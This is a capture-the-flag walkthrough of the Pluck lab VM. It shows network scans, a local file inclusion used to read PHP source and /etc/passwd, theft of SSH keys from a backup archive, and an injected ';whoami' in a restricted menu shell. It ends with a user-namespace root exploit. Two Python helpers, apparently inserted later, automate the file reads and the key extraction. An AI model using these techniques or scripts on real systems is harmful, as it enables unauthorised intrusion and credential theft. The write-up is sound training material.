Pluck

Mert
7 min read · Mar 13, 2017


First I discovered the IP address of the Pluck VM with netdiscover.

root@kali:~# netdiscover -r 10.0.2.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 -----------------------------------------------------------------------------
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 10.0.2.1        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.2.2        52:54:00:12:35:00      1      60  Unknown vendor
 10.0.2.3        08:00:27:39:51:42      1      60  Cadmus Computer Systems
 10.0.2.42       08:00:27:45:29:54      1      60  Cadmus Computer Systems

Then I scanned all TCP ports and grabbed service banners.

root@kali:~# nmap -p- --script=banner 10.0.2.42
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 10.0.2.42
Host is up (0.0010s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
|_banner: SSH-2.0-OpenSSH_7.3p1 Ubuntu-1
80/tcp   open  http
3306/tcp open  mysql
| banner: A\x00\x00\x00\xFFj\x04Host '10.0.2.5' is not allowed to connect
|_ to this MySQL server
5355/tcp open  unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 22.98 seconds

Only 22 and 80 looked promising: MySQL rejected connections from my host outright, and 5355/tcp is the LLMNR port (systemd-resolved). I started with port 80/tcp and opened the site in a browser.

There were index.php and admin.php pages. about.php and contact.php were loaded through the page parameter of index.php, i.e. index.php?page=about.php.

There was no clue in the page source and dirb found nothing useful. The page parameter of index.php suggested a local file inclusion: if the value goes straight into include(), the php://filter wrapper can return a PHP file base64-encoded instead of executing it, which is the standard way to read server-side source through an LFI. First I tried to read admin.php, hoping for usernames and passwords.

Request:

GET /index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1
Host: 10.0.2.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

Response:


</nav>
<div class="container">
<br><br><br><br>
<div class=jumbotron>[base64-encoded admin.php source, omitted here]</div><br> <hr>
<div class="row">
<div class="col-sm-12">
<footer>
<p>© Copyright 2017 Pluck</p>
</footer>

This request returned the admin.php source base64-encoded, sitting in the jumbotron div where the included page is normally rendered. Decoding it gave the admin.php below.

admin.php:

<?php
include("header.php");
echo "<br><br><br>";
if ($_POST){
echo '
<br><br>
<div class="container">
<div class="row">
<div class="col-md-8 col-md-offset-2">
<div class="alert alert-danger" role="alert">';
// No database query is ever made: the response depends only on whether
// the submitted email contains a single quote.
if(strpos($_POST['email'], '\'') !== false) {
echo "<strong>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6</strong>";
}else{
echo "<strong>Incorrect Username or Password!</strong>";
}

?>
</div>
</div>
</div>
</div>
<?php
}
?>
<br>
<div class="container">
<div class="row vertical-offset-100">
<div class="col-md-4 col-md-offset-4">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Admin</h3>
</div>
<div class="panel-body">
<form accept-charset="UTF-8" role="form" action="admin.php" method="post">
<fieldset>
<div class="form-group">
<input class="form-control" placeholder="E-mail" name="email" type="text">
</div>
<div class="form-group">
<input class="form-control" placeholder="Password" name="password" type="password" value="">
</div>
<div class="checkbox">
</div>
<input class="btn btn-lg btn-success btn-block" type="submit" value="Login">
</fieldset>
</form>
</div>
</div>
</div>
</div>
<?php
include("footer.php");
?>

The page did not even try to log in. It only returned one of two static strings depending on whether the email contained a single quote, so the "SQL error" was fake and there was no injection to chase. The other PHP pages held nothing useful either.

So I ran nikto against port 80/tcp.
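The request and decode above, packaged as an added helper (my example, not code from the original write-up): it builds the php://filter and ../ traversal URLs used against this box, pulls the base64 payload out of the HTML that index.php wraps around the included file, and decodes it. The target URL and the page parameter follow the post; the HTTP response inside the block is constructed, not captured from the VM.

```python
"""Read PHP source through the page= include using the php://filter wrapper.

Added example, not from the original write-up. The URL and parameter name
follow the post; the response used below is constructed, not captured.
"""
import base64
import re
from urllib.parse import quote, urlencode

BASE_URL = "http://10.0.2.42/index.php"  # target from the post
PAGE_PARAM = "page"                      # the vulnerable include() parameter


def filter_read_url(target, base_url=BASE_URL, param=PAGE_PARAM):
    """URL that makes include() hand back `target` base64-encoded instead of
    executing it, so PHP source survives the trip through the page."""
    wrapper = f"php://filter/convert.base64-encode/resource={target}"
    return f"{base_url}?{urlencode({param: wrapper})}"


def traversal_url(path, depth=10, base_url=BASE_URL, param=PAGE_PARAM):
    """Plain ../ traversal for files include() returns verbatim (non-PHP files
    such as /etc/passwd or the backup tarball)."""
    rel = "../" * depth + path.lstrip("/")
    return f"{base_url}?{param}={quote(rel, safe='/')}"


# Where this particular index.php renders the included page (from the post).
JUMBOTRON_RE = re.compile(rb"<div class=jumbotron>(.*?)</div>", re.S)
# Fallback for other layouts: the longest base64-looking run in the body.
B64_RUN_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def extract_included_source(html):
    """Pull the base64 payload out of the surrounding HTML and decode it.

    index.php prints its header, then the include() output, then the footer,
    so the payload sits where the page body normally renders. Raises
    ValueError (binascii.Error is a subclass) when nothing decodable is found.
    """
    m = JUMBOTRON_RE.search(html)
    candidate = m.group(1).strip() if m else b""
    if not candidate:
        runs = B64_RUN_RE.findall(html)
        candidate = max(runs, key=len) if runs else b""
    if not candidate:
        raise ValueError("no base64 payload in response")
    return base64.b64decode(candidate, validate=True)


# Constructed stand-in for admin.php; not the real file from the box.
SAMPLE_SOURCE = (
    b"<?php\n// constructed stand-in for admin.php, not the real file\n"
    b'$note = "static error strings, no real login";\n?>\n'
)


def build_sample_response(payload=SAMPLE_SOURCE):
    """Constructed response shaped like the one in the post: header HTML,
    the base64 blob inside the jumbotron div, footer HTML."""
    return (
        b"</nav>\n<div class=\"container\">\n<br><br><br><br>\n"
        b"<div class=jumbotron>" + base64.b64encode(payload) + b"</div><br> <hr>\n"
        b"<footer><p>&copy; Copyright 2017 Pluck</p></footer>\n"
    )


if __name__ == "__main__":
    print(filter_read_url("admin.php"))
    print(traversal_url("/etc/passwd"))
    print(extract_included_source(build_sample_response()).decode())
```

In practice you feed the body of the real HTTP response to extract_included_source; the validate=True flag makes a normal page (no payload) fail loudly instead of producing garbage, which is what you want when scripting reads of many files.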

root@kali:~# nikto -h http://10.0.2.42
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.2.42
+ Target Hostname:    10.0.2.42
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 12 item(s) reported on remote host
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
root@kali:~#

OK, file traversal. Requesting /index.php?page=../../../../../../../../../../etc/passwd returned the passwd file.

Two entries in passwd stood out: one referenced backup.sh and one referenced pdmenu. I started by reading backup.sh through the same traversal, and it pointed me at a new file, backup.tar.

Then I downloaded backup.tar. The download seemed to run forever and crashed at about 6.23 GB. After a few tries I realised that the same files were repeating, so I deleted the earlier attempts and downloaded again, this time interrupting the transfer at about 200 MB.

wget "http://10.0.2.42/index.php?page=../../../../../../../../../../../backups/backup.tar" -O backup.tar

The most important thing in the backup was a set of SSH keys under home/paul/keys/.

root@kali:~/Desktop# tar -tvf backup.tar
tar: This does not look like a tar archive
tar: Skipping to next header
-rw-r--r-- 1000/1000         0 1983-01-09 14:03 ome/bob/.sudo_as_admin_successful
tar: Skipping to next header
drwxr-xr-x root/root         0 2017-01-18 03:27 home/
drwxr-xr-x bob/bob           0 2017-01-18 07:43 home/bob/
-rw-r--r-- bob/bob        3771 2017-01-18 00:39 home/bob/.bashrc
-rw-r--r-- bob/bob           0 2017-01-18 03:40 home/bob/.sudo_as_admin_successful
-rw-r--r-- bob/bob         655 2017-01-18 00:39 home/bob/.profile
-rw-r--r-- bob/bob         220 2017-01-18 00:39 home/bob/.bash_logout
drwxr-xr-x paul/paul         0 2017-01-18 13:13 home/paul/
drwxrwxr-x paul/paul         0 2017-01-18 13:09 home/paul/keys/
-rwxrwxr-x paul/paul       600 2017-01-18 13:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul       600 2017-01-18 13:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul       672 2017-01-18 13:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul       392 2017-01-18 13:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul       600 2017-01-18 13:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul      1675 2017-01-18 13:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul       668 2017-01-18 13:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul       668 2017-01-18 13:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul       600 2017-01-18 13:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul       392 2017-01-18 13:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul      1679 2017-01-18 13:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul       668 2017-01-18 13:08 home/paul/keys/id_key3

-rw-r--r-- paul/paul      3771 2017-01-18 03:04 home/paul/.bashrc
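tar's "Skipping to next header" above is the symptom of the HTML that index.php prints before the included file: the archive does not start at byte 0. The following carver, an added example rather than anything from the original write-up, does what tar does by hand: it finds the first header whose ustar magic and checksum both validate, walks the member headers from there, and reports which members survived an interrupted download. The archive and the HTML prefix are constructed inline with placeholder contents (no real key material).

```python
"""Carve a tar archive out of a download that index.php wrapped in HTML.

Added example, not from the original write-up. The sample archive and the
HTML prefix are constructed here; nothing is fetched from the target.
"""
import io
import tarfile

TAR_BLOCK = 512
MAGIC_OFFSET = 257  # the "ustar" magic lives at this offset inside a header

# Constructed stand-in for the HTML index.php emits before the included file.
HTML_PREFIX = (
    b"<!DOCTYPE html>\n<html><head><title>Pluck</title></head><body>\n"
    b"<nav class=\"navbar\">constructed header</nav>\n<div class=\"container\">\n"
)

# Constructed archive members; placeholder contents, no real keys.
SAMPLE_FILES = [
    ("home/paul/.bashrc", b"# constructed .bashrc\n"),
    ("home/paul/keys/id_key4.pub", b"ssh-rsa AAAAB3NzaC1yc2E-placeholder paul@pluck\n"),
    ("home/paul/keys/id_key4",
     b"-----BEGIN RSA PRIVATE KEY-----\nplaceholder\n-----END RSA PRIVATE KEY-----\n"),
]


def build_sample_blob(keep=None):
    """HTML prefix + ustar archive; `keep` cuts the archive after that many
    bytes to imitate a download that was interrupted."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, data in SAMPLE_FILES:
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tf.addfile(ti, io.BytesIO(data))
    raw = buf.getvalue()
    if keep is not None:
        raw = raw[:keep]
    return HTML_PREFIX + raw


def _octal(field):
    """Parse a NUL/space padded octal header field; an empty field means 0."""
    text = field.strip(b"\0 ")
    return int(text, 8) if text else 0


def header_checksum_ok(block):
    """Validate a 512-byte header the way tar does: sum every byte with the
    checksum field itself counted as eight spaces."""
    if len(block) != TAR_BLOCK:
        return False
    try:
        stored = _octal(block[148:156])
    except ValueError:
        return False
    computed = sum(block[:148]) + 8 * ord(" ") + sum(block[156:])
    return stored == computed


def find_tar_start(blob):
    """Offset of the first header whose magic and checksum both check out, else -1.
    A bare "ustar" match inside garbage is rejected by the checksum."""
    pos = 0
    while (m := blob.find(b"ustar", pos)) != -1:
        start = m - MAGIC_OFFSET
        if start >= 0 and header_checksum_ok(blob[start:start + TAR_BLOCK]):
            return start
        pos = m + 1
    return -1


def list_members(blob, start):
    """Walk headers from `start`; stop at the end-of-archive zero block, at a
    bad checksum, or where the download was cut. Returns (name, size, complete)."""
    members = []
    off = start
    while off + TAR_BLOCK <= len(blob):
        hdr = blob[off:off + TAR_BLOCK]
        if hdr == b"\0" * TAR_BLOCK or not header_checksum_ok(hdr):
            break
        name = hdr[0:100].split(b"\0")[0].decode("utf-8", "replace")
        prefix = hdr[345:500].split(b"\0")[0].decode("utf-8", "replace")
        if prefix:  # ustar splits long paths into prefix + name
            name = prefix + "/" + name
        size = _octal(hdr[124:136])
        data_start = off + TAR_BLOCK
        members.append((name, size, data_start + size <= len(blob)))
        off = data_start + ((size + TAR_BLOCK - 1) // TAR_BLOCK) * TAR_BLOCK
    return members


def carve_tar(blob):
    """Return (offset of the archive inside blob, member listing)."""
    start = find_tar_start(blob)
    if start < 0:
        raise ValueError("no tar header found")
    return start, list_members(blob, start)


if __name__ == "__main__":
    off, members = carve_tar(build_sample_blob())
    print(f"tar starts at byte {off}")
    for name, size, complete in members:
        print(f"{'ok ' if complete else 'CUT'} {size:6d} {name}")
```

Against a real download, write blob[start:] to a new file and tar -tvf will list it without the "does not look like a tar archive" complaint; the complete flag tells you which members of a truncated transfer are worth extracting at all.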

tar's complaint about the first bytes is expected: index.php prints its own HTML before the included file, so the archive does not begin at byte 0 and tar skips forward to the first valid header (the "ome/bob/..." entry with a 1983 date is a misaligned read). I extracted the files and tried the keys against Pluck; the fourth one logged me in as paul. One caveat: tar run as root keeps the archive's 775 mode on the private keys, and ssh refuses a key that is group- or world-readable ("permissions are too open"), so chmod 600 them before passing them with -i.

root@kali:~/.ssh# cd /root/Desktop/home/paul/keys/
root@kali:~/Desktop/home/paul/keys# ls
id_key1 id_key2 id_key3 id_key4 id_key5 id_key6
id_key1.pub id_key2.pub id_key3.pub id_key4.pub id_key5.pub id_key6.pub
root@kali:~/Desktop/home/paul/keys# cp * /root/.ssh/
root@kali:~/Desktop/home/paul/keys# cd /root/.ssh
root@kali:~/.ssh# ls
id_key1 id_key2.pub id_key4 id_key5.pub known_hosts
id_key1.pub id_key3 id_key4.pub id_key6
id_key2 id_key3.pub id_key5 id_key6.pub
root@kali:~/.ssh#
root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42

The SSH session dropped straight into pdmenu, a menu-driven restricted shell, instead of a normal shell.

I tried to run commands through the menu entries by appending ;whoami to the input of each one.

The Edit File entry was the one that worked. It first opened vim.

After I quit vim with :q<Enter>, the output of whoami appeared, so the filename is handed to a shell without quoting.

root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42
Last login: from 10.0.2.5
paul
Press Enter to return to Pdmenu.

Then I opened a bash shell from the menu.

root@kali:~/Desktop/home/paul/keys# ssh -i id_key4 paul@10.0.2.42
Last login: from 10.0.2.5
paul@pluck:~$

Time to get root. As usual, I first checked the kernel version.

paul@pluck:~$ uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

I forgot the screenshot, but cat /etc/lsb-release showed Ubuntu 16.10.

I searched for Ubuntu 16.10 vulnerabilities and found a local privilege escalation.

I had not used this vulnerability before, so I searched further and found a write-up with a working PoC for it.

I downloaded the PoC files, transferred them to Pluck, compiled them and followed the write-up's steps. That gave me root.

paul@pluck:~$ ls
CreateSetgidBinary.c  keys  SuidExec.c  unix-privesc-check.sh  UserNamespaceExec.c
paul@pluck:~$ gcc -o CreateSetgidBinary CreateSetgidBinary.c
paul@pluck:~$ gcc -o UserNamespaceExec UserNamespaceExec.c
paul@pluck:~$ gcc -o SuidExec SuidExec.c
paul@pluck:~$ mkdir mnt test
paul@pluck:~$ setfacl -m "d:u:$(id -u):rwx" test
paul@pluck:~$ ./UserNamespaceExec -- /bin/bash
Setting uid map in /proc/3187/uid_map
Setting gid map in /proc/3187/gid_map
euid: 0, egid: 0
euid: 0, egid: 0
root@pluck:~#
